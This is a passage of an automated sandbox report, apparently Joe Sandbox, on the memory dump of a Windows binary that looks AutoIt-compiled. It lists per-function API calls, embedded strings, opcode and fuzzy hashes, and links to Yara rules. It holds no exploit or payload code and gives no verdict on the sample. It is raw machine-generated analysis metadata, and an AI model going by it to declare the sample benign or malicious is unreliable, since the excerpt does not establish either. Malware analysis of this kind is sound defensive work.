                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: BuffCharMessageSendUpper
                                                  • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                  • API String ID: 3974292440-4258414348
                                                  • Opcode ID: c1d3a3e61125ccfdeaa98624ce5a0ec3898826138488366c098d9f89b0ca9acb
                                                  • Instruction ID: 0e492a309f1449d437c2d037f81bc1290a199242fa7e361a29b0dc70a4096eea
                                                  • Opcode Fuzzy Hash: c1d3a3e61125ccfdeaa98624ce5a0ec3898826138488366c098d9f89b0ca9acb
                                                  • Instruction Fuzzy Hash: 2F915E712047019BDB08EF10C455B6EB7E1BF96750F1588ACF8A65B3A2CB70ED4ADB81
                                                  Function 00C4B7FE Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 197windowlibraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00C4B8B4
                                                  • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00C491C2), ref: 00C4B910
                                                  • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00C4B949
                                                  • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00C4B98C
                                                  • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00C4B9C3
                                                  • FreeLibrary.KERNEL32(?), ref: 00C4B9CF
                                                  • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00C4B9DF
                                                  • DestroyIcon.USER32(?,?,?,?,?,00C491C2), ref: 00C4B9EE
                                                  • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00C4BA0B
                                                  • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00C4BA17
                                                    • Part of subcall function 00BE2EFD: __wcsicmp_l.LIBCMT ref: 00BE2F86
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                  • String ID: .dll$.exe$.icl
                                                  • API String ID: 1212759294-1154884017
                                                  • Opcode ID: cb6e44cb82dda811796e9a373c9c28cb24bbbb3777bcc1923fa84d9263a7ae09
                                                  • Instruction ID: b9efe735e6118d3f253f6af16957bbc5bb4f3b7bd07ca45f673c97bd2bbb250f
                                                  • Opcode Fuzzy Hash: cb6e44cb82dda811796e9a373c9c28cb24bbbb3777bcc1923fa84d9263a7ae09
                                                  • Instruction Fuzzy Hash: C761A771940219BAEB14DF65CC45BBE7BBCFB18720F108159FA25961C0DB74AE81EBA0
                                                  Function 00C2DC1A Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 185timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetLocalTime.KERNEL32(?), ref: 00C2DCDC
                                                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 00C2DCEC
                                                  • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00C2DCF8
                                                  • __wsplitpath.LIBCMT ref: 00C2DD56
                                                  • _wcscat.LIBCMT ref: 00C2DD6E
                                                  • _wcscat.LIBCMT ref: 00C2DD80
                                                  • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00C2DD95
                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00C2DDA9
                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00C2DDDB
                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00C2DDFC
                                                  • _wcscpy.LIBCMT ref: 00C2DE08
                                                  • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00C2DE47
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                  • String ID: *.*
                                                  • API String ID: 3566783562-438819550
                                                  • Opcode ID: cf9a118d1b8073212233b9d7f4a7a7d5f3c3d261aeceba867cd931d1c55d5bba
                                                  • Instruction ID: 48bf42c634a25d485836b25c29cb1c81c9fcb7208aed65aa31c6fc08ac56f67c
                                                  • Opcode Fuzzy Hash: cf9a118d1b8073212233b9d7f4a7a7d5f3c3d261aeceba867cd931d1c55d5bba
                                                  • Instruction Fuzzy Hash: DB6189765042159FCB10EF20D844EAEB3E8FF99310F04896EF99AC7251DB71EA45CB92
                                                  Function 00C29C38 Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 150COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • LoadStringW.USER32(00000066,?,00000FFF,00000016), ref: 00C29C7F
                                                    • Part of subcall function 00BC7DE1: _memmove.LIBCMT ref: 00BC7E22
                                                  • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00C29CA0
                                                  • __swprintf.LIBCMT ref: 00C29CF9
                                                  • __swprintf.LIBCMT ref: 00C29D12
                                                  • _wprintf.LIBCMT ref: 00C29DB9
                                                  • _wprintf.LIBCMT ref: 00C29DD7
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: LoadString__swprintf_wprintf$_memmove
                                                  • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                  • API String ID: 311963372-3080491070
                                                  • Opcode ID: 07b0c5e6c28e7eb0e20d333d2454ea594e4ebff4af5fe59840e9c81eb03fb2f4
                                                  • Instruction ID: 46841ca230e42a17be33a195765ea3a8a482466a92c14eabc6e8164fd844d70c
                                                  • Opcode Fuzzy Hash: 07b0c5e6c28e7eb0e20d333d2454ea594e4ebff4af5fe59840e9c81eb03fb2f4
                                                  • Instruction Fuzzy Hash: DA516F71940619AACF14EBE0DD46FEEB7B8EF14300F5040A9B509721A1DF712F99DB61
                                                  Function 00C2A352 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00BC9837: __itow.LIBCMT ref: 00BC9862
                                                    • Part of subcall function 00BC9837: __swprintf.LIBCMT ref: 00BC98AC
                                                  • CharLowerBuffW.USER32(?,?), ref: 00C2A3CB
                                                  • GetDriveTypeW.KERNEL32 ref: 00C2A418
                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00C2A460
                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00C2A497
                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00C2A4C5
                                                    • Part of subcall function 00BC7BCC: _memmove.LIBCMT ref: 00BC7C06
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                  • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                  • API String ID: 2698844021-4113822522
                                                  • Opcode ID: 60d7d4bb5fde07c5543d13df4b0fe308a7182c01a5ae678c0034a75a9e30d5e7
                                                  • Instruction ID: 16d2bc3704f890266a28ea223e9e455fa4845c43231c606f420ac149f9d237d7
                                                  • Opcode Fuzzy Hash: 60d7d4bb5fde07c5543d13df4b0fe308a7182c01a5ae678c0034a75a9e30d5e7
                                                  • Instruction Fuzzy Hash: 9D514B711043059FC700EF14C895E6AB7E4FF98758F1088ADF89A972A1DB71EE0ACB52
                                                  Function 00C1F8AA Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 138windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,00000000,?,00BFE029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000), ref: 00C1F8DF
                                                  • LoadStringW.USER32(00000000,?,00BFE029,00000001), ref: 00C1F8E8
                                                    • Part of subcall function 00BC7DE1: _memmove.LIBCMT ref: 00BC7E22
                                                  • GetModuleHandleW.KERNEL32(00000000,00C85310,?,00000FFF,?,?,00BFE029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000,00000001), ref: 00C1F90A
                                                  • LoadStringW.USER32(00000000,?,00BFE029,00000001), ref: 00C1F90D
                                                  • __swprintf.LIBCMT ref: 00C1F95D
                                                  • __swprintf.LIBCMT ref: 00C1F96E
                                                  • _wprintf.LIBCMT ref: 00C1FA17
                                                  • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00C1FA2E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                                                  • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                  • API String ID: 984253442-2268648507
                                                  • Opcode ID: f9e071a9ef630e9c91f3740e9695bbed83136e48595061cd254fb393593a9ddf
                                                  • Instruction ID: f4b139c51bf83627c9d74db593a27fba2d2ade16ad86b68486c95a6d0896f0be
                                                  • Opcode Fuzzy Hash: f9e071a9ef630e9c91f3740e9695bbed83136e48595061cd254fb393593a9ddf
                                                  • Instruction Fuzzy Hash: 10415072944109AACF14FBE0DD56EEEB7B8EF19310F1000A9B505720A2EE756F4ADF60
                                                  Function 00C4BA33 Relevance: 22.6, APIs: 15, Instructions: 130filecommemoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00C49207,?,?), ref: 00C4BA56
                                                  • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00C49207,?,?,00000000,?), ref: 00C4BA6D
                                                  • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00C49207,?,?,00000000,?), ref: 00C4BA78
                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,00C49207,?,?,00000000,?), ref: 00C4BA85
                                                  • GlobalLock.KERNEL32(00000000), ref: 00C4BA8E
                                                  • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00C49207,?,?,00000000,?), ref: 00C4BA9D
                                                  • GlobalUnlock.KERNEL32(00000000), ref: 00C4BAA6
                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,00C49207,?,?,00000000,?), ref: 00C4BAAD
                                                  • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00C49207,?,?,00000000,?), ref: 00C4BABE
                                                  • OleLoadPicture.OLEAUT32(?,00000000,00000000,00C52CAC,?), ref: 00C4BAD7
                                                  • GlobalFree.KERNEL32(00000000), ref: 00C4BAE7
                                                  • GetObjectW.GDI32(00000000,00000018,?), ref: 00C4BB0B
                                                  • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 00C4BB36
                                                  • DeleteObject.GDI32(00000000), ref: 00C4BB5E
                                                  • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00C4BB74
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                  • String ID:
                                                  • API String ID: 3840717409-0
                                                  • Opcode ID: 066389ca4e42323207d0c01e300d3c831dc01679bb4c1dc99e7197a1bca5bbb9
                                                  • Instruction ID: 95facf8493862227df4e85105bbc4aa2e8c07f0fa969beeac6855f767eeb758e
                                                  • Opcode Fuzzy Hash: 066389ca4e42323207d0c01e300d3c831dc01679bb4c1dc99e7197a1bca5bbb9
                                                  • Instruction Fuzzy Hash: 64410679600209AFDB219F65DC88FAFBBB8FB8A711F104068F915D7260D7709E42DB60
                                                  Function 00C2D899 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 230COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • __wsplitpath.LIBCMT ref: 00C2DA10
                                                  • _wcscat.LIBCMT ref: 00C2DA28
                                                  • _wcscat.LIBCMT ref: 00C2DA3A
                                                  • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00C2DA4F
                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00C2DA63
                                                  • GetFileAttributesW.KERNEL32(?), ref: 00C2DA7B
                                                  • SetFileAttributesW.KERNEL32(?,00000000), ref: 00C2DA95
                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00C2DAA7
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                  • String ID: *.*
                                                  • API String ID: 34673085-438819550
                                                  • Opcode ID: 2fc80f1fb191b3ef670c9d3c2e8fc27c34047c2a387b7cce8798fe9845a78f6d
                                                  • Instruction ID: dcae33b0444ae172739c726c6f83338ab0294b3efe4f74183bde24c771704fb6
                                                  • Opcode Fuzzy Hash: 2fc80f1fb191b3ef670c9d3c2e8fc27c34047c2a387b7cce8798fe9845a78f6d
                                                  • Instruction Fuzzy Hash: BB81C3715043509FCB24EF65D844AAEB7E8BF99310F14886EF89AC7650EB30DE85CB52
                                                  Function 00C4C1AC Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00BC2612: GetWindowLongW.USER32(?,000000EB), ref: 00BC2623
                                                  • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00C4C1FC
                                                  • GetFocus.USER32 ref: 00C4C20C
                                                  • GetDlgCtrlID.USER32(00000000), ref: 00C4C217
                                                  • _memset.LIBCMT ref: 00C4C342
                                                  • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00C4C36D
                                                  • GetMenuItemCount.USER32(?), ref: 00C4C38D
                                                  • GetMenuItemID.USER32(?,00000000), ref: 00C4C3A0
                                                  • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00C4C3D4
                                                  • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00C4C41C
                                                  • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00C4C454
                                                  • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 00C4C489
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                  • String ID: 0
                                                  • API String ID: 1296962147-4108050209
                                                  • Opcode ID: 8a6ff845202186f6eccf05e4c85f4fd732e9d1e35edda453a6bca31e3718cfa0
                                                  • Instruction ID: 6d8d41469750b809039484421b3d02116d02dba3cf19c6d63c5b174c427d41ba
                                                  • Opcode Fuzzy Hash: 8a6ff845202186f6eccf05e4c85f4fd732e9d1e35edda453a6bca31e3718cfa0
                                                  • Instruction Fuzzy Hash: 2E817C74609301AFD760DF14C9D4ABBBBE8FB88714F00492EF9A5972A1D770D905CB62
                                                  Function 00C3731A Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetDC.USER32(00000000), ref: 00C3738F
                                                  • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00C3739B
                                                  • CreateCompatibleDC.GDI32(?), ref: 00C373A7
                                                  • SelectObject.GDI32(00000000,?), ref: 00C373B4
                                                  • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00C37408
                                                  • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00C37444
                                                  • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00C37468
                                                  • SelectObject.GDI32(00000006,?), ref: 00C37470
                                                  • DeleteObject.GDI32(?), ref: 00C37479
                                                  • DeleteDC.GDI32(00000006), ref: 00C37480
                                                  • ReleaseDC.USER32(00000000,?), ref: 00C3748B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                  • String ID: (
                                                  • API String ID: 2598888154-3887548279
                                                  • Opcode ID: 0921be61717521fce787b20113ee8254348dbcb10ff4ffd2495d118acc71acb0
                                                  • Instruction ID: 909885393994b0819a08e9a830b5922dfb8cef4d5119852d7ffa462ad55f3e33
                                                  • Opcode Fuzzy Hash: 0921be61717521fce787b20113ee8254348dbcb10ff4ffd2495d118acc71acb0
                                                  • Instruction Fuzzy Hash: 575138B5904209EFCB24CFA9CC85FAEBBB9FF49310F14852DF95997220C771A9418B60
                                                  Function 00BC6A8C Relevance: 19.7, APIs: 4, Strings: 7, Instructions: 478COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00BE0957: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00BC6B0C,?,00008000), ref: 00BE0973
                                                    • Part of subcall function 00BC4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00BC4743,?,?,00BC37AE,?), ref: 00BC4770
                                                  • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00BC6BAD
                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00BC6CFA
                                                    • Part of subcall function 00BC586D: _wcscpy.LIBCMT ref: 00BC58A5
                                                    • Part of subcall function 00BE363D: _iswctype.LIBCMT ref: 00BE3645
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                                  • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                  • API String ID: 537147316-1018226102
                                                  • Opcode ID: dbfdd8d33bb9bac85f4d6913032456c870801d72c8aad661824cbda06e863e07
                                                  • Instruction ID: 3c7ee553a2f76dc48a3713f3b288310d10360f7aab2d2a6aa816381d1502da1f
                                                  • Opcode Fuzzy Hash: dbfdd8d33bb9bac85f4d6913032456c870801d72c8aad661824cbda06e863e07
                                                  • Instruction Fuzzy Hash: F802BE301083459FC724EF24C881EAFBBE5EF99314F0049ADF596972A1DB70E989CB52
                                                  Function 00C22D36 Relevance: 19.7, APIs: 13, Instructions: 214windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • _memset.LIBCMT ref: 00C22D50
                                                  • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00C22DDD
                                                  • GetMenuItemCount.USER32(00C85890), ref: 00C22E66
                                                  • DeleteMenu.USER32(00C85890,00000005,00000000,000000F5,?,?), ref: 00C22EF6
                                                  • DeleteMenu.USER32(00C85890,00000004,00000000), ref: 00C22EFE
                                                  • DeleteMenu.USER32(00C85890,00000006,00000000), ref: 00C22F06
                                                  • DeleteMenu.USER32(00C85890,00000003,00000000), ref: 00C22F0E
                                                  • GetMenuItemCount.USER32(00C85890), ref: 00C22F16
                                                  • SetMenuItemInfoW.USER32(00C85890,00000004,00000000,00000030), ref: 00C22F4C
                                                  • GetCursorPos.USER32(?), ref: 00C22F56
                                                  • SetForegroundWindow.USER32(00000000), ref: 00C22F5F
                                                  • TrackPopupMenuEx.USER32(00C85890,00000000,?,00000000,00000000,00000000), ref: 00C22F72
                                                  • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00C22F7E
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                  • String ID:
                                                  • API String ID: 3993528054-0
                                                  • Opcode ID: f5e4ecfa1ccb0679856aca452a1cfc33dbd1e556ede1a87f2a0d7d50dcf73cc1
                                                  • Instruction ID: bef90201f9507fe7db66243bd0fbe1f9468851e4d847155d10105da51fe2439a
                                                  • Opcode Fuzzy Hash: f5e4ecfa1ccb0679856aca452a1cfc33dbd1e556ede1a87f2a0d7d50dcf73cc1
                                                  • Instruction Fuzzy Hash: 1F71F770600225BFEB218F55EC45FAEBF64FF05724F10421AF625A65E1CBB15D20EB91
                                                  Function 00C40E1A Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 120COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00C3FDAD,?,?), ref: 00C40E31
                                                  Strings
                                                  Memory Dump Source
